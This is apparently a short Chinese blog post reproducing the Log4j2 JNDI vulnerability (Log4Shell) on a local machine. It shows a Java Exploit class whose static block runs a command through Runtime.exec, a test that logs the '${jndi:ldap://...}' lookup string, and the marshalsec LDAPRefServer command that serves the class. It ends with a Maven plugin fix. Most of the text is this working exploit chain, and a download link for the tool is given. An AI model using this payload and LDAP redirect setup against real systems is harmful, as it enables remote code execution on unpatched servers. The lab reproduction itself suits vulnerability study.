提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
log4j2问题复现
一、废话不多说,直接开整
maven依赖
目录结构
Exp.java
class Exploit{
Exploit(){
}
static {
System.err.println("Pwned");
try {
String cmds = "calc";
Runtime.getRuntime().exec(cmds);
} catch ( Exception e ) {
e.printStackTrace();
}
}
}
Log4j2Test
public class Log4j2Test {
public static final Logger logger = LogManager.getLogger();
public static void main(String[] args) {
logger.error("${jndi:ldap://localhost:8888/Exploit}");
}
}
\src\test\java>javac exp.java
编译成.class文件
marshalsec-0.0.3-SNAPSHOT-all.jar(需要下载的jar地址)
> http://www.btyear.com/csdn/1974.html#
在对应目录cmd 运行
```java
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888
在运行main方法
可能存在BUG
Failed to execute goal org.codehaus.mojo:exec-maven-plugin:1.6.0:exec (default-cli) on project
<build>
<plugins>
<plugin>
<groupId>org.codehaus.mojo</groupId>
<artifactId>exec-maven-plugin</artifactId>
<version>1.6.0</version>
<executions>
<execution>
<goals>
<goal>java</goal>
</goals>
</execution>
</executions>
<configuration>
<classpathScope>test</classpathScope>
</configuration>
</plugin>
</plugins>
</build>